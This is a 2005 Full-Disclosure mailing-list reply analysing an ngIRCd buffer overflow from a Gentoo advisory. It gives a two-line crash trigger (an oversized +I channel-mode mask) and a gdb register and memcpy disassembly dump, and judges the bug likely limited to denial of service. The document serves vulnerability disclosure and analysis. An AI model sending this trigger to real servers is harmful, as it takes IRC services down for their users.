
Re: [Full-Disclosure] [ GLSA 200501-40 ] ngIRCd: Buffer overflow




>   Severity: High
>      Title: ngIRCd: Buffer overflow
>       Date: January 28, 2005
>       Bugs: #79705
>         ID: 200501-40
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> ngIRCd is vulnerable to a buffer overflow that can be used to crash the
> daemon and possibly execute arbitrary code.

After a quick check, IMHO the bug is not exploitable beyond a denial of service — but treat that as provisional, since it rests on a single crash. What the dump below shows: the fault is in the trailing `repz movsb` of memcpy (eip = memcpy+108) with ecx = 0xffffad7f, i.e. a huge unsigned length (looks like a negative int handed to memcpy as the size; note the memcpy's `js`/`jns` checks treat such a count as negative and skip the unrolled loop, going straight to the byte copy with the full count), and edi sitting exactly on a page boundary (0x806d000). So the copy simply ran off the end of mapped heap. Everything between the real destination and that page boundary was already overwritten before the SIGSEGV, and whether anything useful (heap metadata, other connection/channel state) lives in that range is not something a quick check settles.

to reproduce the bug, from a client connected to the vulnerable server, send (where `aaax300here` is shorthand for a run of 300 `a` characters and `aaax128here` for a run of 128):

/j #test
/mode #test +I aaax300here@aaax128here


and watch the daemon go down with:

Program received signal SIGSEGV, Segmentation fault.
0x400c5b8c in memcpy () from /lib/libc.so.6
(gdb) info all-registers
eax            0x8067e2c        134643244
ecx            0xffffad7f       -21121
edx            0x80650ca        134631626
ebx            0xffffff53       -173
esp            0xbfffeb24       0xbfffeb24
ebp            0xbfffeb58       0xbfffeb58
esi            0x806a29e        134652574
edi            0x806d000        134664192
eip            0x400c5b8c       0x400c5b8c

Dump of assembler code for function memcpy:
0x400c5b20 <memcpy>:    push   %edi
0x400c5b21 <memcpy+1>:  push   %esi
0x400c5b22 <memcpy+2>:  mov    0xc(%esp,1),%edi
0x400c5b26 <memcpy+6>:  mov    0x10(%esp,1),%esi
0x400c5b2a <memcpy+10>: mov    0x14(%esp,1),%ecx
0x400c5b2e <memcpy+14>: mov    %edi,%eax
0x400c5b30 <memcpy+16>: cld
0x400c5b31 <memcpy+17>: cmp    $0x20,%ecx
0x400c5b34 <memcpy+20>: jbe    0x400c5b8c <memcpy+108>
0x400c5b36 <memcpy+22>: neg    %eax
0x400c5b38 <memcpy+24>: and    $0x3,%eax
0x400c5b3b <memcpy+27>: sub    %eax,%ecx
0x400c5b3d <memcpy+29>: xchg   %eax,%ecx
0x400c5b3e <memcpy+30>: repz movsb %ds:(%esi),%es:(%edi)
0x400c5b40 <memcpy+32>: mov    %eax,%ecx
0x400c5b42 <memcpy+34>: sub    $0x20,%ecx
0x400c5b45 <memcpy+37>: js     0x400c5b85 <memcpy+101>
0x400c5b47 <memcpy+39>: mov    (%edi),%eax
0x400c5b49 <memcpy+41>: mov    0x1c(%edi),%edx
0x400c5b4c <memcpy+44>: sub    $0x20,%ecx
0x400c5b4f <memcpy+47>: mov    (%esi),%eax
0x400c5b51 <memcpy+49>: mov    0x4(%esi),%edx
0x400c5b54 <memcpy+52>: mov    %eax,(%edi)
0x400c5b56 <memcpy+54>: mov    %edx,0x4(%edi)
0x400c5b59 <memcpy+57>: mov    0x8(%esi),%eax
0x400c5b5c <memcpy+60>: mov    0xc(%esi),%edx
0x400c5b5f <memcpy+63>: mov    %eax,0x8(%edi)
0x400c5b62 <memcpy+66>: mov    %edx,0xc(%edi)
0x400c5b65 <memcpy+69>: mov    0x10(%esi),%eax
0x400c5b68 <memcpy+72>: mov    0x14(%esi),%edx
0x400c5b6b <memcpy+75>: mov    %eax,0x10(%edi)
0x400c5b6e <memcpy+78>: mov    %edx,0x14(%edi)
0x400c5b71 <memcpy+81>: mov    0x18(%esi),%eax
0x400c5b74 <memcpy+84>: mov    0x1c(%esi),%edx
0x400c5b77 <memcpy+87>: mov    %eax,0x18(%edi)
0x400c5b7a <memcpy+90>: mov    %edx,0x1c(%edi)
0x400c5b7d <memcpy+93>: lea    0x20(%esi),%esi
0x400c5b80 <memcpy+96>: lea    0x20(%edi),%edi
0x400c5b83 <memcpy+99>: jns    0x400c5b49 <memcpy+41>
0x400c5b85 <memcpy+101>:        add    $0x20,%ecx
0x400c5b88 <memcpy+104>:        mov    0xc(%esp,1),%eax
0x400c5b8c <memcpy+108>:        repz movsb %ds:(%esi),%es:(%edi)
0x400c5b8e <memcpy+110>:        pop    %esi
0x400c5b8f <memcpy+111>:        pop    %edi
0x400c5b90 <memcpy+112>:        ret
0x400c5b91 <memcpy+113>:        nop
0x400c5b92 <memcpy+114>:        nop
0x400c5b93 <memcpy+115>:        nop
0x400c5b94 <memcpy+116>:        nop
0x400c5b95 <memcpy+117>:        nop
0x400c5b96 <memcpy+118>:        nop
0x400c5b97 <memcpy+119>:        nop
0x400c5b98 <memcpy+120>:        nop
0x400c5b99 <memcpy+121>:        nop
0x400c5b9a <memcpy+122>:        nop
0x400c5b9b <memcpy+123>:        nop
0x400c5b9c <memcpy+124>:        nop
0x400c5b9d <memcpy+125>:        nop
0x400c5b9e <memcpy+126>:        nop
0x400c5b9f <memcpy+127>:        nop
End of assembler dump.
(gdb)

yours
-q